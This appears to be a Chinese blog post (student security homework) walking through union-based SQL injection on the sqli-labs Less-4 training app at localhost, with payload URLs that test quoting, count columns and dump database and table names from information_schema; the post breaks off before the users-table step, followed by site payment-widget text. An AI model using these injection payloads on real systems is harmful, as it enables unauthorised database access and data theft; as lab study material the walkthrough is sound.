我的网安作业2/7

这篇博客详细记录了作者在sqli-labs的不同关卡中进行SQL注入攻击的过程,从判断注入点、查看数据库信息到获取用户信息。此外,还分享了在CTF挑战中解决Web、Misc和Crypto问题的思路,包括利用工具和编程技巧解密栅栏密码,最终获取flag。作者表示在学习过程中不断摸索,期待提升自己的技能。
摘要由CSDN通过智能技术生成

一、sqli-labs

less4:

打开less4的index.php文件,在SQL语句下添加如下两句:

echo $sql;
echo "<br>";

1.判断是否存在注入:

http://127.0.0.1/sqli/Less-4/?id=1
http://127.0.0.1/sqli/Less-4/?id=1'显式正确
http://127.0.0.1/sqli/Less-4/?id=1"显式不正确

得到报错信息:
在这里插入图片描述
根据报错信息构造正确的SQL语句:

http://127.0.0.1/sqli/Less-4/?id=1")--+

2.查看列数:

http://127.0.0.1/sqli/Less-4/?id=1") order by 3--+显示正常
http://127.0.0.1/sqli/Less-4/?id=1") order by 4--+显示不正常

得到列数为3
3.判断回显位置:

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,3--+

在这里插入图片描述

4.查看所有数据库:

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(schema_name)from information_schema.schemata--+

在这里插入图片描述

5.查看security数据库的所有表:

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479--+

在这里插入图片描述

6.查看users表所有的列信息:


                
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值